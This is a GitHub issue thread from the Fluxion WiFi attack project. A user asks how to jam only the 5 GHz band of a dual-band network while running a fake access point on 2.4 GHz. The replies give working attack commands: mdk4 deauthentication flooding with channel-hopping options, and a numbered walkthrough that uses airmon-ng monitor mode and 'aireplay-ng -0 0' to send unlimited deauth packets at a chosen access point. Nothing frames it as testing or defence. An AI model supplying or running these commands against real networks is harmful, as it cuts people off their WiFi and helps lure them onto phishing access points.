### ISSUE TITLE
how to only jam a WiFi?

### ISSUE THREAD

**Issue by jinglei207** [FluxionNetwork/fluxion#819]
I want to attack a dual band WiFi. 2.4 GHz with normal fluxion, and only jam the 5ghz band. I don't need AP on 5ghz band since one on 2.4ghz is enough.
Anyone knows how to only jam 5ghz?

**Comment by strasharo** [comment]
Run mdk4 manually on whatever band you want.

**Comment by jinglei207** [comment]
> Run mdk4 manually on whatever band you want.

But, it can't auto switch channel right?

**Comment by strasharo** [comment]
If you don't specify a channel on the commandline it will hop on all of the channels, the problem is when you use the same adapter for the fake AP, since the AP will hop along too. Better to run it on a separate channel and leave it to hop freely.

**Comment by jinglei207** [comment]
> If you don't specify a channel on the commandline it will hop on all of the channels, the problem is when you use the same adapter for the fake AP, since the AP will hop along too. Better to run it on a separate channel and leave it to hop freely.
 I tried the `mdk4 wlan0 d  -c -B xx:xx:xx:xx:xx`
But doesn't auto switch channels.
Do you have a better code?

**Comment by strasharo** [comment]
-c h

**Comment by jinglei207** [comment]
> > If you don't specify a channel on the commandline it will hop on all of the channels, the problem is when you use the same adapter for the fake AP, since the AP will hop along too. Better to run it on a separate channel and leave it to hop freely.
> > I tried the `mdk4 wlan0 d  -c -B xx:xx:xx:xx:xx`
> > But doesn't auto switch channels, it stays at 2.557ghz,
> > Do you have a better code?



> -c h

`mdk4 wlan0 d -c h -B xx:xx:xx:xx:xx` ?
Doesn't work either, I only want to jam the bssid, don't wanna run the fake AP.
This bssid is on 5ghz.

**Comment by strasharo** [comment]
Just list the 5ghz channels after the -c argument separated with commas:
https://github.com/aircrack-ng/mdk4/issues/24#issuecomment-481635600

**Comment by iahmeddd** [comment]
1) Check your network card is in which mode. Manged or Monitor
# iwconfig
Aftert that
2) Convert your network card to Monitor Mode
# airmon-ng start wlan0
wlan0 is the wifi adapter name...
again check that your card is converted to monitor mode or not.
# iwconfig
You will see there is "mon" added to your wifi adapter name
Now you want to stop single A.P
3) aireplay-ng -0 0 -a 00:00:00:00:00:00 wlan0mon
-0 0 >> is for Deauth where 2nd 0 is for unlimited packets of Deauth
after -a put the MAC address of A.P you want to block.
for any query message me.
